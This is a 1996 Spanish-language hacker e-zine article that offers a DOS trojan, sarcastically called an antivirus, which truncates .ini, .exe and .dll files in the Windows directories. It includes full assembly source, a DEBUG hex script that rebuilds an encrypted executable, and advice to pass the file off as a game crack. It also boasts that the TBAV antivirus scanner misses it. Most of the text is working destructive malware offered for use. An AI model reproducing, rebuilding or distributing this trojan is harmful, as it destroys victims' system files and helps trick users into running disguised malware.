תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתEתsתtתeתתתeתsתתתuתnתתתsתiתmתpתlתiתsתiתmתoתתתAתnתtתiתWתiתrתuתsתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתcתrתeתaתdתoתתתpתoתrתתת{Motor-Psico}תתתתpתaתrתaתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתְמG­oןתיתMוןKהsתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתGrOuP.תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתEsteתtroyanoתesת(enתsiertaתforma)תforת"LammersתUser"תyaתqueתtruncaתdelת
directrioתWindowsתyתWin95תlosתarchivosת*.ini,ת*.exe,ת*.dllת.Seriaתconvenienteתת
queתelתqueתresivaתelתfileת(antesתcomprimidoתoתencriptadoתporתsiתloתeditan)תתתתת
creaתqueתesתunaתutilidadת(Obvioתno?),תqueתseriaתcreibleתsiתfueraתunתCRACKתparaת
unתjuego.תMiתinteresתesתbajarתelתWindowsתnoתdatosתoתtrabajosת(ensimaתqueתelתתתת
pobreתinstaloתwindows,noתleתbamosתaתcagarתsusתboludases,תno?),תperoתsiתestoתseת
quiereתllebarתaתcaboתsoloתbastaתconתcambiarתlasתvariablesתTipo1,תTipo2ת,Tipo3תת
yתsiתseתquiereתotroתdirectorioתcambiarתWindowsתyתWin95.תDebajoתdelתfuenteתestaת
elתprogramaתcompiladoתyתescritoתenתhexaתparaתserתrearmadoתconתelתdebugתdeתlaתתת
siguienteתforma:תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתC:\>DEBUGת<ANTIWIR.HEXתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
Paraתaquellosתqueתnoתposeenתelתa86ת(Elתresultanteתestaתencriptadoתlistoתparaתתת
truncar).תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
+NoתesתdetectadoתporתelתTbavתP-)תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
+Rapidoתyתefectivo.תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
(LM)**(LM)**(LM)**(LM)**[{CoRtA & tRuNcA}]**(LM)**(LM)**(LM)**(LM)**(LM)**(LM)
TRNK:                   ;Comienzo
        mov ah,03bh     ;Funcion 3bh cambia al directorio se₪alado por
        lea dx,Windows  ;ds:dx con terminacion 0
        int 21h         

        lea dx,TipoUno  ;offset de *.ini
        call Busco_F    ;boy a la rutina de buscar y truncar
        lea dx,TipoDos  ;offset de *.dll
        call Busco_F    ;etc
        lea dx,TipoTres ;etc
        call Busco_F    ;etc
        
        mov ah,03bh     ;Funcion de cambio de directorio
        lea dx,Win95    ;esta vez al WINDOWS95 (puaggggg)
        int 21h
                
        lea dx,TipoUno  
        call Busco_F
        lea dx,TipoDos
        call Busco_F
        lea dx,TipoTres
        call Busco_F
        jmp Chau         ; termino el programa
        
;Rutina de desinfectaci¢n y optimizaci¢n del HD 

Busco_F:
        mov ah,4eh      ;Busco el Primer file
        mov cx,0000h    ;<===Son los atributos del file
        int 21h
        jnc LeoDTA      ;Si lo encuetra voy a LeoDTA
 ret                    ;Sino retorno debajo del call

LeoDTA: 
        mov dx, 009eh   ;Offset del bufer donde la int anterior nos tiro el 
                        ;nombre del archivo

Borro:
        mov ah,3ch      ;Funci¢n de crear o truncar un archivo (el nombre deve
                        ;apuntado por ds:dx y terminar con 0)
        int 21h

        mov ah,4fh      ;Funcion de buscar el proximo file
        int 21h
        jnc Borro       ;si  encuntro el file boy a borrar
 ret

Chau:
        lea dx,lm       ;dx=offset LM
        mov ah,09h      ;Funci¢n para la impreci¢n en pantalla de un String$
        int 21h
        mov ax,04c00h   ;Funci¢n de terminar el programa
        int 21h

Dir db '*.*'
TipoUno db '*.ini',0
TipoDos db '*.exe',0
Tipotres db '*.dll',0
Windows db '\windows',0
Win95 db '\win95',0
Raiz db '\',0
lm db 0a,0d 
 db '        EsTe eS Un EjEmPlO De AnTiWiRuS CrEaDo PoR MotoR-PsicO',0a,0d
 db 0a,0d
 db 'Si FuIsTeS ViCtImA De El JoDeTe PoR CoNfIaR En DoNdE Te Lo CoNsEgUiStEs',0a,0d
 db '<<<<<<<<<<La SeGuRiDaD ToTaL Es SuFiCiEnTe MoTiVo PaRa DeScOnFiAr>>>>>>>>',0a,0d
 db '                           ִִ¿ ',0a,0d
 db 'ִִִִִִִִִִִִִִִִױִױִ¸ִ¸ִִִִ³ִִִֵױִ¸ִ¸ִױִִִִִִִִִִִִִִִִִִִִִִִִִִִִִ- ',0a,0d
 db '                ְ ְ  ¸ ³ ױ³ ְ ְ‏',0a,0d
 db '                ֿ¿ ֿ¿  ³ ³ ³³ ֿ¿ ֿ¿',0a,0d
 db '                         ְֽ־ֽ³        ',0a,0d
 db '                        ֹֽ(@)ֽ»ִִִִִ{LM}',0a,0d
 db '                  ֹֽֽֽֽֽֽֽֽֽֽֽֽֽֽֽֽֽ»',0a,0d  
 db '              \ִִִ¶ְמG­oן  י  MוןKהsִִִַ/',0a,0d
 db '               >  ָֽֽֽֽֽֽֽֽֽֽֽֽֽֽֽֽֽׁׁ¼  <',0a,0d
 db '              /ִִִִִ   *ִִOִִ*     ְִִִִִ\',0a,0d
 db '                          ״¿',0a,0d
 db '                          ³ְ ',0a,0d
 db '                           ְִִִ¿',0a,0d,'$'
end TRNK


*(LM)**(LM)**(LM)**(LM)**[{E.O.CoRtA & tRuNcA}]**(LM)**(LM)**(LM)**(LM)**(LM)*

(LM)**(LM)**(LM)**(LM)**[{CoRtA & DEBUG <ANTIWIR.HEX}]**(LM)**(LM)**(LM)**(LM)

e100 e9 81 3 e1 41 f4 61 e7 be 49 2a 10 42 e7 bc 49
e110 2a 2e 42 e7 aa 49 2a 4 42 fd 9b e0 d7 49 d 2f
e120 14 c4 42 51 4f 49 14 ee 42 51 49 49 14 d0 42 51
e130 43 49 29 0 42 fd 88 e1 42 49 d 2f 93 49 3 e6
e140 f8 4a 16 64 d 2f 16 d9 d 2f ac ac 3 e6 c2 49
e150 16 b7 d 2f 1a 48 8e f5 61 17 68 17 64 7b a9 24
e160 a9 4a 64 7b a5 22 a5 4a 64 7b a6 d6 ae 4a be 23
e170 a9 24 a6 3b d7 3f 42 c5 d7 d1 a8 61 95 4a be 4a
e180 44 b4 85 3f b6 ed 62 ec f3 2a b5 24 62 c a4 d
e190 ad da ae db 62 d a5 2a 81 24 b6 d1 b7 d1 8c 3d
e1a0 f3 2a 83 38 85 e9 86 3b 62 d9 af d8 62 74 af 3e
e1b0 af d8 6d d9 93 d1 a3 db 62 26 8e 75 dd a a3 e9
e1c0 bc e9 a7 24 68 3e ae ee 68 e8 ac d0 44 b4 44 b4
e1d0 f3 d1 62 73 d5 71 93 de a5 df 62 c3 a9 f d6 71
e1e0 ad 9 62 d a5 2a 85 d6 62 77 af e a5 de a5 2a
e1f0 f2 3b 8c 2a 83 3b 88 dc 89 e9 8c 2a 85 24 62 d
e200 af c4 a6 d 62 dd a5 2a 8e 3b 62 e af c4 93 d
e210 a7 dd a9 df d6 d 93 b0 4d 65 9e 66 9e 66 9e 66
e220 9e 66 9e 76 a1 2a f3 ed 87 3d 8c d1 86 e9 86 2a
e230 b6 3b b6 e9 8e 2a 85 3f 62 de d5 7c a9 f a9 d
e240 a8 de a5 2a 8d 3b b6 d1 b0 3b 62 d9 a1 d8 a1 2a
e250 86 ed f3 ef 8f 24 80 d1 81 38 98 74 98 74 98 74
e260 98 74 44 b4 62 29 62 29 62 29 62 29 62 29 62 29
e270 62 29 62 29 62 29 62 29 62 29 62 29 62 29 61 47
e280 6 8c 1f 28 44 b4 6 8c 6 8c 6 8c 6 8c 6 8c
e290 6 8c 6 8c 6 8c 35 8c 35 8c 1a 8c 1a 8c 6 8c
e2a0 6 fd 6 8c 5 8c 35 8c 1a 8c 1a 8c 35 8c 6 8c
e2b0 6 8c 6 8c 6 8c 6 8c 6 8c 6 8c 6 8c 6 8c
e2c0 6 8c 6 8c 6 8c 6 8c 6 8c 6d 29 44 b4 62 29
e2d0 62 29 62 29 62 29 62 29 62 29 62 29 62 29 2 4e
e2e0 39 28 2 19 39 28 62 e1 62 fe 61 5c d3 2a 2 4f
e2f0 39 28 1 4a 39 b6 4d 29 62 29 62 29 62 29 62 29
e300 62 29 62 29 62 29 61 47 f 89 61 47 f 89 62 29
e310 d3 2a d3 2a d3 ff 61 47 f 89 61 47 f 89 44 b4
e320 62 29 62 29 62 29 62 29 62 29 62 29 62 29 62 29
e330 62 29 62 29 62 29 62 29 62 89 e 5a e 47 d3 2a
e340 62 29 62 29 62 29 62 b7 4d 29 62 29 62 29 62 29
e350 62 29 62 29 62 29 62 29 62 29 62 29 62 29 62 29
e360 62 f0 d 10 82 11 d e5 6 8c 6 8c 6 25 8e 75
e370 dd b0 4d 29 62 29 62 29 62 29 62 29 62 29 62 29
e380 62 29 62 29 62 f0 e 5b e 5b d f6 e 5b e 5b
e390 d f6 e 5b e 5b e 5b d e5 44 b4 62 29 62 29
e3a0 62 29 62 29 62 29 62 29 62 29 be 8e 6 8c 10 88
e3b0 28 71 ed 3b 2f 28 61 50 ff 2a 62 74 26 b9 84 6e
e3c0 fd 3f 7 8c 6 8c 6f b7 4d 29 62 29 62 29 62 29
e3d0 62 29 62 29 62 29 62 29 98 2a 62 f1 e 5f e 5b
e3e0 e 5b e 5b e 5b e 5b e 5b e 5b e 5f d e4
e3f0 62 29 9e b0 4d 29 62 29 62 29 62 29 62 29 62 29
e400 62 29 62 7a 6 8c 6 8c 5 47 62 29 62 17 6 8c
e410 8f 8e 6 16 62 29 62 29 62 89 6 8c 6 8c 6 c4
e420 44 b4 62 29 62 29 62 29 62 29 62 29 62 29 62 29
e430 62 29 62 29 62 29 62 29 62 29 62 29 3b 40 1f b6
e440 4d 29 62 29 62 29 62 29 62 29 62 29 62 29 62 29
e450 62 29 62 29 62 29 62 29 62 29 61 40 d3 8a 62 b7
e460 4d 29 62 29 62 29 62 29 62 29 62 29 62 29 62 29
e470 62 29 62 29 62 29 62 29 62 29 62 29 2 8c 6 8c
e480 1f b6 4d 2d bf c 6 b9 d1 0 87 5 81 c0 9c fd
e490 53 e8 d 0 44 81 eb a c 80 87 15 c ba eb 5
e4a0 31 5b eb f1 78 80 af 15 c ba 5b eb 6 90 d1 c8
e4b0 eb 16 90 50 e8 3 0 58 eb f4 e4 21 c 2 e6 21
e4c0 c3 e4 21 34 2 e6 21 c3 50 e8 f5 ff 58 eb 2 ea
e4d0 d2 40 fa eb 9 90 d1 c0 e8 8 0 eb 21 90 e8 2
e4e0 0 eb f3 50 1e 33 c0 8e d8 eb 1 ea 87 6 4 0
e4f0 eb 1 9a 87 6 c 0 87 6 4 0 1f 58 c3 eb 6
e500 90 d1 c8 eb 16 90 50 e8 3 0 58 eb f4 e4 21 c
e510 2 e6 21 c3 e4 21 34 2 e6 21 c3 50 e8 f5 ff 58
e520 eb 2 ea d2 40 81 e8 5b 38 eb 9 e3 e6 21 34 2
e530 eb a b6 de 50 e4 21 34 2 eb f1 d5 e6 21 58 81
e540 f0 cf e4 86 e0 fa eb 9 90 d1 c0 e8 8 0 eb 21
e550 90 e8 2 0 eb f3 50 1e 33 c0 8e d8 eb 1 ea 87
e560 6 4 0 eb 1 9a 87 6 c 0 87 6 4 0 1f 58
e570 c3 81 c0 9c fd 53 e8 d 0 44 81 eb a c 80 87
e580 15 c ba eb 5 31 5b eb f1 78 80 af 15 c ba 5b
e590 eb 6 90 d1 c8 eb 16 90 50 e8 3 0 58 eb f4 e4
e5a0 21 c 2 e6 21 c3 e4 21 34 2 e6 21 c3 50 e8 f5
e5b0 ff 58 eb 2 ea d2 40 fa eb 9 90 d1 c0 e8 8 0
e5c0 eb 21 90 e8 2 0 eb f3 50 1e 33 c0 8e d8 eb 1
e5d0 ea 87 6 4 0 eb 1 9a 87 6 c 0 87 6 4 0
e5e0 1f 58 c3 81 c0 9c fd 53 e8 d 0 44 81 eb a c
e5f0 80 87 15 c ba eb 5 31 5b eb f1 78 80 af 15 c
e600 ba 5b 87 5 47 47 49 74 3 e9 7e fe 20 da 24 82
e610 c4 28 24 81 1d c0 38 81 b1 a6 85 7e 87 81 e0 2e
e620 ca c c fb 28 7f 8f 75 c2 e5 72 f3 af c2 ff 76
e630 2e 44 c5 30 b1 81 b2 81 b0 7f 87 82 af b3 2b 10
e640 c2 b8 14 4b d9 49 25 d3 22 d2 e1 3 25 de 24 d2
e650 dc 51 94 52 78 eb 81 b b1 b 89 af bd c2 af 81
e660 c0 78 69 81 25 f8 b1 81 c0 78 6b 81 25 f8 4a 15
e670 6f 81 22 28 ae 47 72 82 af b3 2b 44 88 b8 45 d4
e680 5f c2 65 81 c5 f8 67 81 bd f8 5f ba 69 81 ad f8
e690 6b 81 bd f8 ee 2d 5f d9 25 cd 25 80 b1 81 13 c1
e6a0 af eb db ec 83 1 b0 73 af da 6e 82 ab 52 be a0
e6b0 22 c2 22 ca bd c2 bd e8 37 7f b1 7a ba 2d 61 8d
e6c0 c3 2b 2a 7f af c2 7c d4 aa 9f 6c 4a b1 82 20 6a
e6d0 a8 a9 3c ce 9 f4 44 30 98 98 b1
rbx
0
rcx
5db
nantiwir.com
w
q
                                                                              
**(LM)**(LM)**(LM)**[{E.O.CoRtA & DEBUG <ANTIWIR.HEX}]**(LM)**(LM)**(LM)**(LM)
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
Reservadosתtodosתlosתderechos.תLaתreproducci¢nתtotalתparcialתdeתestaתobraתתתתתת
quedaתrigurosamenteתprohibida,תsinתlaתautorizacionתdeתlosתtutorialesתdelתתתתתתת
copyright,תbajoתlasתsancionesתestablecidasתporתlasתleyes.תתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
Subtituladaתenתespa₪olתporתKriminal-Mamboת&תPanRayadoתenתlosתa₪osתdeת1996תתתתתת
entreתlosתpechosתardientesתdeתlaתCoca.ת(Monumentoתaתlaתteta)תתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
(C)תCaCaתMoNdOת1996תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
(C)תSuBתMundOת(LiVerTaD.AnarkicA.SuB-TeRRaNeA)ת1996תתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
CaCaתMoNdO,תSuBתMundO,ת(LiVerTaD.AnarkicA.SuB-TeRRaNeA)תKriminal-Mambo,תתתתתתתת
PanRayadoתyתMotor-PsicoתsonתmarcasתregistradasתporתKranת("SoldadoתContraתUnaתתת
RomaתEnתDecadencia)ת1996.תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
-=נ[({תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת})]נ=-תת
-=נ[({YתRecurden:תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת})]נ=-תת
-=נ[({תתתתתתתתתת"ParaתLosתCesaresתLaתMasתDespiadadaתArmaתNoתSeתTemeתתתת})]נ=-תת
-=נ[({תתתתתתתתתתתTantoתComoתUnתSoloתIdealתEnתVosתDeתMinorias..."תתתתתתת})]נ=-תת
-=נ[({תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתKraNתתת})]נ=-תת
-=נ[({תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת})]נ=-תת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
GrAcIeתPeR:תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתDestroyerתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתCoyoteתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתKlauSSתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת{Motor-Psico}ת1996תMtrPsico@cabagn.sld.arjתתתתת
תתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתתת